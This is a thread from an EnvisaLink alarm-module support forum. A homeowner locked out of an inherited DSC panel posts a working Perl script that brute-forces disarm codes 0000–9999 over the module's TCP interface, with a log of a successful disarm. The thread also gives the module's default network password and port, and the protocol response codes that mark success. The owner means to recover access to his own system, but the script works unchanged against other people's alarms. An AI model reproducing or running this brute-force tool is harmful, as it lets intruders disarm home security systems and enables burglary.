EVL 4, DSC and lost installer code - hacking my own system

Information and support for EnvisaLink modules.

Moderators: GrandWizard, EyezOnRich

mikep
Posts: 138
Joined: Wed May 30, 2012 1:49 pm
Contact:

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby mikep » Fri Jan 21, 2022 10:03 am

The 5108A response seem to indicate the panel has been armed in stay mode.
671 says the function isn't available (maybe a response to the *8 to enter installer programming while armed).
652 says the partition has been armed, looks to be in stay mode.
DscServer for android/linux/windows: https://sites.google.com/site/mppsuite/dscserver

K-Man
Posts: 137
Joined: Fri Jun 01, 2012 1:08 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby K-Man » Fri Jan 21, 2022 10:41 am

Yeah, MikeP has it right. You can't go into installers mode with the panel armed. You need to disarm all partitions on DSC systems to enter installers mode.

homediy
Posts: 6
Joined: Thu Jan 20, 2022 8:31 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby homediy » Fri Jan 21, 2022 2:27 pm

mikep wrote:The 5108A response seem to indicate the panel has been armed in stay mode.
671 says the function isn't available (maybe a response to the *8 to enter installer programming while armed).
652 says the partition has been armed, looks to be in stay mode.


K-Man wrote:Yeah, MikeP has it right. You can't go into installers mode with the panel armed. You need to disarm all partitions on DSC systems to enter installers mode.


Thanks MikeP and K-Man, this is very helpful!!

So here's my situation, I bought a preowned home and inherited the already installed DSC system that was disarmed. I was given a code (assuming it's a user code) but as of today it didn't work. The system was disarmed but after my d*cking around i accidentally armed and trying the code passed on to me doesn't work, it didn't accept the code.

Thanks for indicating that I need to disarm first before I can get into the system. So now I'm thinking:

1. modify the script to brute force (to identify any code) that would disarm the system/partition (not sure what command/codes to send)
2. Run the original code to find my installer code?

Any help on what commands to send to send disarming code?

Also, is there somewhere that explains some of these HEX response codes?

My last resorts:
1. try hardwire factory reset (which means I need to learn how to reprogram existing system setup). Any reference on how to re-program would be helpful.
2. buy a new PC1616 board and replace it.


TIA!!

GrandWizard
Posts: 2143
Joined: Tue Nov 16, 2010 4:08 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby GrandWizard » Sun Jan 23, 2022 10:01 am

If you can't find a valid user code then you will have to factory default the panel unfortunately.

homediy
Posts: 6
Joined: Thu Jan 20, 2022 8:31 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby homediy » Wed Jan 26, 2022 8:23 pm

Could I modify the script to brute force to simulate keypress to disarm the partition with user code?

Something like this:
1. send command 040 + 1<usercode>
2. look for a response code of 650, 655 or 750 (any other response code would be indicate a failure)
<loop again if not 650, 655, or 750)


Two things i'm uncertain:
1. I'm not too sure to use 040 or 071
2. physically on a keypad it says enter your user code to disarm, if incorrect, enter "#" followed by next user code. Do I need to simulate the "#" in code, if previous code is incorrect?

homediy
Posts: 6
Joined: Thu Jan 20, 2022 8:31 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby homediy » Sat Jan 29, 2022 5:03 pm

To brute force to find my installer code I had to disarm my system first (I was given the wrong user code), I managed to figure it out what commands to send and modified the shared script to brute force for a user code.
The only issue in my script is my IF statement at the end to catch the user code if found won't exit the loop, it just waits for more responses. But once I heard the successful "disarm" beep from my panel, I stopped my script manually.

The output when a user code is found looks like this:

Code: Select all

[20220129_130242] DEBUG: Attempting 1234
[20220129_130242] sent data '071119479E\r\n' (length 12)
[20220129_130242] response: '5000712D\r\n' (length 10)
[20220129_130244] response: '51081FF\r\n' (length 9)
[20220129_130244] response: '750100018E\r\n' (length 12)
[20220129_130244] response: '6551D1\r\n' (length 8)
[20220129_130247] response: '6501CC\r\n' (length 8)
[20220129_130319] response: '60900332\r\n' (length 10)
[20220129_130319] response: '6531CF\r\n' (length 8)
[20220129_130320] response: '6100032A\r\n' (length 10)
[20220129_130321] response: '6501CC\r\n' (length 8)
[20220129_130326] response: '60900332\r\n' (length 10)
[20220129_130326] response: '6531CF\r\n' (length 8)
[20220129_130328] response: '6100032A\r\n' (length 10)
[20220129_130328] response: '6501CC\r\n' (length 8)


Here's my contribution (hope this helps in my situation):

Code: Select all

###############################
# - taken from Installer brute force script
###############################
## http://forum.eyez-on.com/FORUM/viewtopic.php?f=6&t=5025

#!/usr/bin/perl

use IO::Socket::INET;
use Time::HiRes qw ( time sleep );

############################
# Edit the variables below #
############################
# This is the IP of your EnvisaLink
# eg. 192.168.0.X, 10.0.0.X, etc.
$ip = "------ IP address here ----------------";

# This is your EnvisaLink password.  The default is user if you haven't changed it.
$password = "user";


# Range which you want to test
$code_start = "0000";
$code_end = "9999";


###############################################
# You shouldn't need to modify the code below #
###############################################

# auto-flush on socket
# force a flush after every write/print
$| = 1;

# Opens a new network socket on port 4025 (default port of EnvisaLink)
$socket = new IO::Socket::INET (
   PeerHost => $ip,
   PeerPort => '4025',
   Proto => 'tcp',
);

die "DEBUG: Cannot connect to EnvisaLink. REASON: $!\n" unless $socket;

# Start logging
# open OUT, ">log." . currenttime() . ".txt";
open(OUT, '>', "log." . currenttime() . ".txt") or die $!;

l0gt("DEBUG: Connected to EnvisaLink");

DSC_get();

DSC_put(DSC_cmd("005", $password));    # 005 - network login

$response = DSC_get();

foreach ($response) {
   /^5000052A.*5051CB/s && l0gt("DEBUG: Correct EnvisaLink password");
   /^5000052A.*5050CA/s && l0gt("DEBUG: Incorrect EnvisaLink password") && exit(1);
   /^.*5052CC/s && l0gt("DEBUG: Timeout") && exit(1);
}

$t = time;

l0gt("DEBUG: ===================================");

l0gt("DEBUG: Start user entry cycle");
l0gt("DEBUG: ----------------------");
for ($code = $code_start; $code <= $code_end; $code++) {

   $scode = sprintf("%04d", $code); # Pad code with leading 0s if <1000
   l0gt("DEBUG: Attempting $scode");
   DSC_put(DSC_cmd("071", "1${scode}"));      # 040 to send disarm command, partition 1, with user code

   # if successful you should get any of or all of the following codes:
   #  609 (Zone open)
   #  610 (Zone restored)
   #  650 or 653 (Partition Ready) response
   #  655 (Partition disarmed) response or
   #  750 (User Opening) response
   
   # if error system will return:
   #    502 (System error)
   #    670 (Invalid Access Code) or 652 (Partition armed)

   #$r = DSC_get_ww("^609|^610|^653|^670|^652|^650|^655|^750"); #look for positive response
   $r = DSC_get_w();

   ## TODO: catching successful isn't work yet.. it doesn't exit
   if ($r =~ /^609|^610|^653|^650|^655|^750/) {
     l0gt("SUCCESS: $scode is the user code");
     l0gt("DEBUG: End user code entry cycle");
     exit(0);
   }
   l0gt("                     ");
}


close OUT;
$socket->close();

# This will create a timestamp in localtime
sub l0gt {
   my $s = shift;
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
   l0g("[" . sprintf("%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec) . "] $s");
}

# This prints to STDOUT as well as logfile
sub l0g {
   my $s = shift;
   print "$s\n";
   print OUT "$s\n";
}

sub currenttime {
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
   my $yyyymmddhhmmss = sprintf "%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec;
   $yyyymmddhhmmss;
}

# Converts text to ASCII values
sub DSC_cs {
   my @chars = (split//, shift);
   my $cs = 0;
   foreach (@chars) { $cs += ord($_); }
   return sprintf("%.2X", $cs & 0xFF);
};

# Formats command
sub DSC_cmd {
   my $cmd = shift . shift;
   return $cmd.DSC_cs($cmd);
}

# Logs a response
sub DSC_get {
   my $response = "";
   $socket->recv($response, 1024);
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   return $response;
}

# Waits for response(s) and logs it
sub DSC_get_w {      # wait for data
   my $response = "";
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   return $response;
}

# Waits for a specific response and logs it
sub DSC_get_ww {      # wait for specific data
   my $response = "";
   my $wanted = shift;
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   unless ($response =~ /$wanted/) { goto X; }
   return $response;
}

# Sends a command and logs it
sub DSC_put {
   my $req = shift . "\r\n";
   my $size = $socket->send($req);
   my $hreq = $req; $hreq =~ s/\n/\\n/g; $hreq =~ s/\r/\\r/g;
   l0gt("sent data '$hreq' (length $size)");
}


Also, with this script I found often that after a few attempts the responses just stop coming but the program doesn't end, nor throw an error; it just sits there. I'm not sure if my connect got cut/interrupted or something. So many times I had to stop the script, update my script to new start number and restart the script where it left off.. the STDOUT wasn't always capturing either, especially when it errors out like that.

So instead, modify the l0gt and l0g to output to screen only and when you run the script to pipe it to tee to capture the output to a file. It guaranteed for me that what I see on the screen will also be in the output file.

Code: Select all

perl <script file> | tee ouputfile.txt


Return to “EnvisaLink ( IP100D, IP170D, 2DS, 3, 4)”

Who is online

Users browsing this forum: No registered users and 11 guests